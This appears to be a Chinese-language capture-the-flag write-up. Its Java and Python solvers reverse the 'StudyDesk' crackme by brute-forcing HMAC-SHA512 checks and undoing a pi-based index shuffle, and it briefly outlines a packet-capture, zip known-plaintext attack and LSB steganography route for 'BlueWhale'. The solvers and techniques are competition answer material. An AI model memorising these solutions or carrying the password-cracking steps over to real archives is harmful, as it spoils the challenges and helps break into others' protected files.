import java.security.InvalidKeyException;
import java.security.NoSuchAlgorithmException;
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;

public class a {
    /* 第一个Java程序
     * 它将输出字符串 Hello World
     */
	public static byte[][] keys;
    public static int[] mask;
    public static String[] cipher;
	public static String checksum(int mask, int idx) {
		int cmd = mask & 7;
		if((mask >>> 3 & 1) == 1) {
			byte [] data = new byte[4];
			for (int i=0x20; i<0x80; i++){
				if (i == 0x61){
					i = 0x7a;
					continue;
				}
				for (int j=0x20; j<0x80; j++){
					if (j == 0x61){
						j = 0x7a;
						continue;
					}
					for (int m=0x20; m<0x80; m++){
						if (m == 0x61){
							m = 0x7a;
							continue;
						}
						for (int n=0x20; n<0x80; n++){
							if (n == 0x61){
								n = 0x7a;
								continue;
							}
							data[0]=(byte)i;
							data[1]=(byte)j;
							data[2]=(byte)m;
							data[3]=(byte)n;
							try {
								SecretKeySpec v1 = new SecretKeySpec(a.keys[cmd], "HmacSha512");
								Mac v3 = Mac.getInstance("HmacSha512");
								v3.init(v1);
								v3.update(data);
								String v2_1;
								for(v2_1 = new BigInteger(1, v3.doFinal()).toString(16); v2_1.length() < 0x20; v2_1 = "0" + v2_1) {
								}
								v2_1 = v2_1.substring(0, 16);
								if (v2_1.equals(a.cipher[idx])){
									System.out.printf("%d %d %d %d", data[0], data[1], data[2], data[3]);
									return new String(data);
								}
							}
							catch(NoSuchAlgorithmException | InvalidKeyException v2) {
								v2.printStackTrace();
								return null;
							}
						}
					}
				}
			}
		}
		else{
			switch (cmd) {
				default:
					break;
			}
		}
		String a = "Not Found";
		return a;
	}

    public static void main(String[] args) {
		a.keys = new byte[][]{"WIgD1ZNZ0ilJqFpw".getBytes(), "4811tjOZjoiXpjdq".getBytes(), "ALFjcgztxnUaC89v".getBytes(), "ZgHzTu79Zwhoi0PB".getBytes(), "UYBfajKYrDFE1zJs".getBytes(), "yr4PBIjlJg89FpP3".getBytes(), "SFHqaTYDf7EeEevX".getBytes(), "gUwrqaE3nCxKr4Du".getBytes()};
        a.mask = new int[]{0xAF, 0xA1, 0xA4, 170, 0xA5, 0xAE, 0xA0, 0xA3};
        a.cipher = new String[]{"fc7466e55fbf37b1", "78b0be39e63b6837", "c2f9c805d0442203", "c11a61bb60d79dab", "869e650ee55bd9f6", "f2dda5fc021fe2bf", "305044db48fe6174", "d6659b5e2d1059f8"};
        int v0;
        for(v0 = 0; true; ++v0) {
            int[] v1 = a.mask;
            if(v0 >= v1.length) {
                break;
            }

            v1[v0] ^= 0xAB;
        }
		int v4 = 0;
		while(v4 < a.keys.length) {
            MessageDigest v0_1 = null;
            try {
                v0_1 = MessageDigest.getInstance("MD5");
            }
            catch(NoSuchAlgorithmException v1_1) {
                v1_1.printStackTrace();
            }

            v0_1.update(a.keys[v4]);
            a.keys[v4] = v0_1.digest();
            ++v4;
        }
		
		int i;
		for (i=0; i<8; i++){
			if (i==0 || i==3 || i==5) continue;
			System.out.printf("%d\\n", a.mask[i]&7);
			String res = checksum(a.mask[i], i);
			System.out.println(res);
		}

        System.out.println("Hello World"); // 输出 Hello World
    }
}

StudyDesk

• 程序逻辑
  1. 输入经过 index_of 来生成关于 index 的 01 串
  2. 将 01 串转化为 bytes 数组
  3. 最后与一个算法的结果进行比较，算法不涉及 input，直接 copy 到 java 里面跑出来

然后写个脚本逆推即可

cipher = [0x73, 0x6F, 43, 0x72, 0x74, 45, 0x30, 36, 84, 98, 89, 36, 38, 66, 38, 43, 84, 0x79, 50, 101, 101, 43, 100, 87, 69, 0x6F, 51, 66, 89, 49, 69, 51, 101, 51, 53, 0x74, 45, 98, 98, 0x72, 50, 36, 98, 50, 85, 85, 85, 107, 66, 36, 53, 51, 0x6F, 0x72, 89, 89, 66, 50, 33, 66, 0x5F, 66, 101, 0x79, 0x5F, 0x40, 33, 66, 50, 0x40, 85, 85, 45, 43, 36, 50, 0x74, 0x30, 85, 0x73, 0x5F, 0x40, 49, 0x72, 50, 101, 101, 51, 51, 43, 53, 51, 53, 51, 85, 50, 0x40, 0x79, 53, 36, 0x40, 69, 89, 98, 45, 0x6F, 101, 36, 97, 66, 100, 0x30, 0x73, 97, 0x30, 36, 0x6F, 101, 50, 0x5F, 49, 0x30, 0x40, 89, 0x74, 85, 0x30, 85, 0x73, 89, 43, 89, 97, 0x30, 89, 0x72, 97, 100, 38, 50, 0x74, 51, 98, 0x75, 0x5F, 50, 0x74, 0x73, 0x6F, 84, 98, 89, 69, 0x6F, 100, 0x30, 0x6F, 98, 89, 0x72, 0x40, 50, 36, 66, 89, 101, 0x72, 51, 84, 51, 50, 36, 38, 0x40, 0x30, 53, 51, 0x30, 49, 97, 0x74, 89, 101, 85, 97, 66, 84, 97, 45, 43, 100, 89, 45, 0x30, 0x73, 0x30, 0x40, 97, 100, 98, 51, 100, 0x6F, 0x73, 50, 53, 101, 66, 101, 0x6F, 0x75, 50, 45, 0x5F, 51, 82, 50, 89, 87, 101, 50, 89, 0x30, 89, 101, 43, 89, 36, 38, 61, 101, 0x40, 84, 89, 0x5F, 66, 0x74, 49, 0x40, 87, 97, 43, 0x5F, 0x73, 43, 0x30, 89, 45, 84, 89, 33, 89, 107, 53, 85, 0x30, 98, 98, 0x5F, 50, 107, 66, 101, 0x6F, 51, 97, 33, 66, 97, 0x75, 51, 0x74, 51, 97, 0x40, 89, 107, 98, 51, 69, 0x40, 73, 0x5F, 0x30, 85, 0x74, 0x30, 97]
havoc = [33, 36, 38, 43, 45, 48, 49, 50, 51, 53, 61, 64, 66, 69, 73, 82, 84, 85, 87, 89, 95, 97, 98, 100, 101, 107, 111, 114, 115, 116, 117, 121]

text = "314159265358979323846264338327950288419716939937510582097494459230781640628620899862803482534211706798214808651328230664709384460955058223172535940812848111745028410270193852110555964462294895493038196442881097566593344612847564823378678316527120190914564856692346034861045432664821339360726024914127372458700660631558817488152092096282925409171536436789259036"
k_text = ""
for i in range(0, len(text), 2):
	n = int(text[i:i+2])
	k_text += "{0:08b}".format(n)
print(k_text)
print(len(k_text))
print(len(cipher))
idxx = []
for i in range(0, len(k_text), 5):
	idx = int(k_text[i:i+5], 2)
	idxx.append(idx)
print(idxx)
flag = [0]*32
for i in range(len(cipher)):
	flag[idxx[i]] = cipher[i]

print(bytes(flag))

import java.io.ByteArrayOutputStream;
import java.math.BigDecimal;
import java.math.MathContext;
import java.math.RoundingMode;
public class a {
    /* 第一个Java程序
     * 它将输出字符串 Hello World
     */
	public static byte[] harvoc;

	public static BigDecimal math_op(BigDecimal arg3, MathContext arg4) {
        BigDecimal v1;
        BigDecimal v0;
        for(v0 = arg3; true; v0 = v1) {
            v1 = new BigDecimal("0.5").multiply(v0.add(arg3.divide(v0, arg4), arg4), arg4);
            if(v1.compareTo(v0) == 0) {  // v1 = 0.5*(v0+(a1/v0))
                return v1;
            }
        }
    }
	public static void a(){
		BigDecimal v2_1 = new BigDecimal("1");
		BigDecimal v2_2 = new BigDecimal("0");
		BigDecimal v2_3 = new BigDecimal("6");
		MathContext mathCon1 = new MathContext(360, RoundingMode.HALF_UP);
		MathContext mathCon2 = new MathContext(720, RoundingMode.HALF_UP);
		int i = 0;
		BigDecimal v10;
		while(true) {
			v2_1 = a.math_op(new BigDecimal("2").subtract(a.math_op(new BigDecimal(4).subtract(v2_1.multiply(v2_1, mathCon2), mathCon2), mathCon2)), mathCon2);
			v2_3 = new BigDecimal("2").multiply(v2_3, mathCon1);
			v10 = new BigDecimal("0.5").multiply(v2_1.multiply(v2_3, mathCon1), mathCon1);
			if(v10.compareTo(v2_2) == 0) {
				break;
			}

			++i;
			if(i % 30 == 0) {
				StringBuilder v0 = new StringBuilder();
				StringBuilder t = v0.append("running");
				t.append(i / 6);
				t.append("%");
				System.out.println("StudyDesk:"+t.toString());
			}

			v2_2 = v10;
		}

		System.out.println("StudyDesk:"+"running: 100%");
		String v2_5 = v10.toString().replace(".", "");
		System.out.println(v2_5);
        System.out.println("Hello World"); // 输出 Hello World
	}
	public static void b(){
		int v0_4;
        BigDecimal v10;
        byte[] input_array;
        String input = "!$&+-01235=@BEIRTUWY_abdekorstuy";
        if(input.length() == 0x20) {
            byte[] harvoc = a.harvoc;
            ByteArrayOutputStream v3 = new ByteArrayOutputStream();
            StringBuilder v4 = new StringBuilder();
            int v6 = 0;
            while(v6 < harvoc.length) {
                int idx = input.indexOf(harvoc[v6]);
                if(idx == -1) {
                    input_array = null;
                    return;
                }
                String t = Integer.toBinaryString((idx & 0x3F) + 0x20).substring(1);
                System.out.println(t);
                v4.append(Integer.toBinaryString((idx & 0x3F) + 0x20).substring(1));
                ++v6;
            }

            int i;
            for(i = 0; i < (40 - v4.length() % 40) % 40; ++i) {
                v4.append('0');
            }

            String v0_3 = v4.toString();
            int v2;
            int v4_1;
            for(v2 = 0; v2 < v0_3.length(); v2 = v4_1) {
                v4_1 = v2 + 8;
                v3.write(((byte)(Integer.parseInt(v0_3.substring(v2, v4_1), 2) & 0xFF)));
            }
            input_array = v3.toByteArray();
        }
	}
    public static void main(String[] args) {
		a.harvoc = new byte[]{0x73, 0x6F, 43, 0x72, 0x74, 45, 0x30, 36, 84, 98, 89, 36, 38, 66, 38, 43, 84, 0x79, 50, 101, 101, 43, 100, 87, 69, 0x6F, 51, 66, 89, 49, 69, 51, 101, 51, 53, 0x74, 45, 98, 98, 0x72, 50, 36, 98, 50, 85, 85, 85, 107, 66, 36, 53, 51, 0x6F, 0x72, 89, 89, 66, 50, 33, 66, 0x5F, 66, 101, 0x79, 0x5F, 0x40, 33, 66, 50, 0x40, 85, 85, 45, 43, 36, 50, 0x74, 0x30, 85, 0x73, 0x5F, 0x40, 49, 0x72, 50, 101, 101, 51, 51, 43, 53, 51, 53, 51, 85, 50, 0x40, 0x79, 53, 36, 0x40, 69, 89, 98, 45, 0x6F, 101, 36, 97, 66, 100, 0x30, 0x73, 97, 0x30, 36, 0x6F, 101, 50, 0x5F, 49, 0x30, 0x40, 89, 0x74, 85, 0x30, 85, 0x73, 89, 43, 89, 97, 0x30, 89, 0x72, 97, 100, 38, 50, 0x74, 51, 98, 0x75, 0x5F, 50, 0x74, 0x73, 0x6F, 84, 98, 89, 69, 0x6F, 100, 0x30, 0x6F, 98, 89, 0x72, 0x40, 50, 36, 66, 89, 101, 0x72, 51, 84, 51, 50, 36, 38, 0x40, 0x30, 53, 51, 0x30, 49, 97, 0x74, 89, 101, 85, 97, 66, 84, 97, 45, 43, 100, 89, 45, 0x30, 0x73, 0x30, 0x40, 97, 100, 98, 51, 100, 0x6F, 0x73, 50, 53, 101, 66, 101, 0x6F, 0x75, 50, 45, 0x5F, 51, 82, 50, 89, 87, 101, 50, 89, 0x30, 89, 101, 43, 89, 36, 38, 61, 101, 0x40, 84, 89, 0x5F, 66, 0x74, 49, 0x40, 87, 97, 43, 0x5F, 0x73, 43, 0x30, 89, 45, 84, 89, 33, 89, 107, 53, 85, 0x30, 98, 98, 0x5F, 50, 107, 66, 101, 0x6F, 51, 97, 33, 66, 97, 0x75, 51, 0x74, 51, 97, 0x40, 89, 107, 98, 51, 69, 0x40, 73, 0x5F, 0x30, 85, 0x74, 0x30, 97};
		b();
    }
}

FamilyBucket

未解出

Good

未解出

Crypto

拟态签到题

base64 点击即送

其余未解出

Misc

BlueWhale

从流量包中可以得到登录 OpenWrt 的密码，和 inside.zip 中 password.txt 的 CRC 结果相同

从而可以通过明文攻击得到压缩包密码

最后在解压得到的图片中可以提取 LSB 中的 flag

其余未解出